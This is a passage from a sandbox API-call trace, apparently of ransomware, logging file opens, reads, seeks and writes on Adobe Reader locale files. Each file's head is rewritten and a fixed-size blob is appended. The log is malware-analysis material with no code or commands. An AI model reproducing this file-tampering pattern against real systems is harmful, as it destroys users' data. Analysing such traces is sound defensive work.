lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.274] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2a00 [0069.274] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.274] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.274] ReleaseMutex (hMutex=0x168) returned 1 [0069.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.DAN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.DAN", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.DAN", lpUsedDefaultChar=0x0) returned 11 [0069.274] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.278] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0069.278] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.278] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0069.279] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e978a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978a8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.279] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0069.279] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0069.279] CloseHandle (hObject=0x1bc) returned 1 [0069.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\DigSig.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\digsig.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0069.286] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.286] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x21e00 [0069.287] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.287] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.287] ReleaseMutex (hMutex=0x168) returned 1 [0069.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.DEU", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.DEU", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.DEU", lpUsedDefaultChar=0x0) returned 10 [0069.287] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0069.657] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x20e00 [0069.657] ReadFile (in: hFile=0x1bc, lpBuffer=0x2866888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2866888*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.744] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x20e00 [0069.745] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.746] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0069.746] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0069.746] CloseHandle (hObject=0x1bc) returned 1 [0069.764] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\PPKLITE.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\ppklite.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0069.807] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.807] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x88400 [0069.807] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.807] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.807] ReleaseMutex (hMutex=0x168) returned 1 [0069.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.DEU", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.DEU", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.DEU", lpUsedDefaultChar=0x0) returned 11 [0069.808] ReadFile (in: hFile=0x1bc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0069.867] ReadFile (in: hFile=0x1bc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.168] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x87400 [0070.169] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.198] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x87400 [0070.199] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.199] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0070.199] WriteFile (in: hFile=0x1bc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0070.200] WriteFile (in: hFile=0x1bc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.200] CloseHandle (hObject=0x1bc) returned 1 [0070.222] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.223] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.223] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe7 [0070.224] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.224] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.224] ReleaseMutex (hMutex=0x168) returned 1 [0070.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0070.224] ReadFile (in: hFile=0x1bc, lpBuffer=0x26bf4f8, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf4f8*, lpNumberOfBytesRead=0x345f2bc*=0xe7, lpOverlapped=0x0) returned 1 [0070.231] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0070.231] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x66f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x345f2d0*=0x66f, lpOverlapped=0x0) returned 1 [0070.231] CloseHandle (hObject=0x1bc) returned 1 [0070.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\BRdlang32.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\brdlang32.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.244] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.244] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3600 [0070.244] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.244] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.245] ReleaseMutex (hMutex=0x168) returned 1 [0070.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.ESP", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.ESP", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.ESP", lpUsedDefaultChar=0x0) returned 13 [0070.245] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.252] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2600 [0070.253] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.253] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2600 [0070.253] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.254] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0070.254] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.254] CloseHandle (hObject=0x1bc) returned 1 [0070.256] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Multimedia.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\multimedia.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.256] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.256] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x14a00 [0070.257] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.257] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.257] ReleaseMutex (hMutex=0x168) returned 1 [0070.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.ESP", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0070.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.ESP", cchWideChar=14, lpMultiByteStr=0x1f7366c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.ESP", lpUsedDefaultChar=0x0) returned 14 [0070.257] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0070.262] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x13a00 [0070.262] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.266] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x13a00 [0070.267] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.267] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0070.267] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0070.268] CloseHandle (hObject=0x1bc) returned 1 [0070.272] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\SendMail.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\sendmail.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.274] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.274] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4000 [0070.274] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.274] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.274] ReleaseMutex (hMutex=0x168) returned 1 [0070.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.ESP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0070.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.ESP", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.ESP", lpUsedDefaultChar=0x0) returned 12 [0070.274] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.277] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3000 [0070.277] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.278] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3000 [0070.278] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.278] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0070.279] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.279] CloseHandle (hObject=0x1bc) returned 1 [0070.284] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\AdobeCollabSync.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\adobecollabsync.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.285] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.286] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0070.286] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.286] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.286] ReleaseMutex (hMutex=0x168) returned 1 [0070.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.EUQ", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0070.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.EUQ", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.EUQ", lpUsedDefaultChar=0x0) returned 19 [0070.286] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0070.615] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0070.616] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0070.616] CloseHandle (hObject=0x1bc) returned 1 [0070.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\IA32.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\ia32.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.865] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0070.865] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe00 [0070.865] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: 